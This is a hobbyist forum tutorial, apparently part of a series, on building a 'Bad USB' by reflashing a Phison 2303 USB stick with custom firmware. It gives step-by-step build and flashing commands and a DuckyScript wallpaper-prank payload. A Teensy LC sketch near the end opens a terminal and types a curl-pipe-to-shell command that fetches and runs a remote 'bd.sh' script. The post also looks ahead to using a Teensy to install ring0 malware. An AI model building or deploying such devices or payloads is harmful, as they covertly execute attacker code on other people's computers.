Hey Mates!
This time I’ll tell you how you can build your own Bad USB for about 10$. It’s pretty easy, but requires a compatible USB Stick.
Requirements
You’ll need an USB Stick with the Phison 2303 (2251-03) microcontroller installed. Sadly you can’t just ask in your favourite hardware shop for the installed firmware, so it’s a luck game 
. I was lucky enough to had already a compatible one at home. You can find a list of known compatible devices here.
How To Test The Microcontroller
Just download the tool from this russian site. It’s the first blue link 
.
You should get an output like this one. You see the second entry at Controller? If there would be Phison 2303 (2251-03) you would have won . This USB Stick is sadly incompatible.
The Build-Environment
Now you’ll have to download Microsoft Visual Studio (2012 or higher) and SDCC. They are required for the next steps.
Building The Source
When you’ve downloaded Visual Studio, you have to get the Source from github. Extract them and open DriveCom and EmbedPayload in Visual Studio. Now build them (Build->Build Solution).
Download A Burner Image
The Burner Image is required for flashing the firmware later on. Again we just have a russian site, but that is no problem . Just search on the site for “BN03” (CTRL+ F) and download the .rar package.
Download The DuckEncoder
If you’ve followed my first part, you’ll already have one installed. If not, just get it here.
How To Flash
Now, that we’re done with preparing our environment, we can start using the tools 
.
Warning
I can not guarantee that everything will run fine. I’ve never encountered any problems, but I can’t promise it. Everything beyond this point is up to you!
Custom Firmware
Go to \Psyschson\firmware and run the build.bat. If everything went right, you should see a new folder called bin with different files in it. We’ll need the fw.bin file.
Creating Your DuckyScript
We discussed that in the earlier parts. I recommend to use something easy, like a wallpaper prank:
GUI d
DELAY 500
PRINTSCREEN
DELAY 100
MENU
DELAY 300
STRING V
DELAY 40
STRING D
DELAY 300
GUI r
DELAY 700
STRING mspaint
ENTER
DELAY 1200
CTRL v
DELAY 500
CTRL s
DELAY 1000
STRING %userprofile%\a.bmp
ENTER
DELAY 500
ALT f
DELAY 400
STRING K
DELAY 100
STRING F
DELAY 1000
ALT F4
DELAY 300
GUI d
Now you have to encode it with the DuckEncoder as I told you in part 1. Here’s a little reminding:
Duckencoder.jar -i <input file> -o <output file> -l <language>
Embedding The Payload
Just run our previously built EmbedPayload like this:
EmbedPayload.exe <Path to Payload> <Path to fw.bin>
Now fw.bin contains our payload. You can overwrite it by running build.bat again .
Dumping The Existing Firmware
I recommend you to dump your existing firmware. Else you couldn’t restore it, when you lost your fun at Bad USB . Just use DriveCom like this:
DriveCom.exe /drive=<letter of your USB drive> /action=DumpFirmware /burner=<Path to our Burner Image> /firmware=<Path to the original fw.bin>
Flashing Our Firmware
Now we can flash our Stick with the modified firmware. But hold in mind that it will be complicated to get the USB back into boot mode again! See the following section for more information.
Again we’ll use DriveCom:
DriveCom.exe /drive=<USB drive letter> /action=SendFirmware /burner=<Path to our Burner Image /firmware=<Path to the modified fw.bin>
If some errors appear, try to use an older version of the Burner Image. In my case it fixed the issue .
Reflashing The Bad USB
If you want to install your original firmware or a new DuckyScript, you’ll have to set the USB back into boot mode again. This is not as complicated as it might look like . Because the Bad USB is a fully functional keyboard, you can’t access it anymore from your computer. To bypass this, you’ll have to shorten the two pins at the bottom left:
At this point props to @anon79434934 for helping me out with the hardware part .
Teensy LC
After my first part, I’ve written with @0x00pf, who already got a Bad USB working by programming a Teensy LC. He did some great work! The following is an equal program - like the one I discussed in my first part - for the Teensy by @0x00pf:
void release_keys (void)
{
// Release all keys
Keyboard.set_modifier (0);
Keyboard.send_now();
delay (100);
}
void setup() {
// put your setup code here, to run once:
delay (1000);
// Launch terminal (GNOME CTRL+ALT+t)
Keyboard.set_modifier (MODIFIERKEY_CTRL | MODIFIERKEY_ALT);
Keyboard.send_now();
delay (100);
Keyboard.press(KEY_T);
Keyboard.release(KEY_T);
delay (500); // Wait for the terminal to come up
release_keys ();
// Send Command
Keyboard.println("curl -s http://127.0.0.1:8000/bd.sh | /bin/sh");
// Close terminal (CTRL+D)
Keyboard.set_modifier (MODIFIERKEY_CTRL);
Keyboard.send_now();
delay (100);
Keyboard.press(KEY_D);
Keyboard.release(KEY_D);
delay (100);
release_keys ();
}
Maybe he’s already working on a part about using a Teensy for installing ring0 malware? We’ll see…
Conclusion
This DIY Bad USB is more like a PoC, because you always have to shorten the two pins for flashing the firmware, which can be annoying . Anyway, I hope you enjoyed this short series and are as excited for @0x00pf’s part as I am .
|-TheDoctor-|
.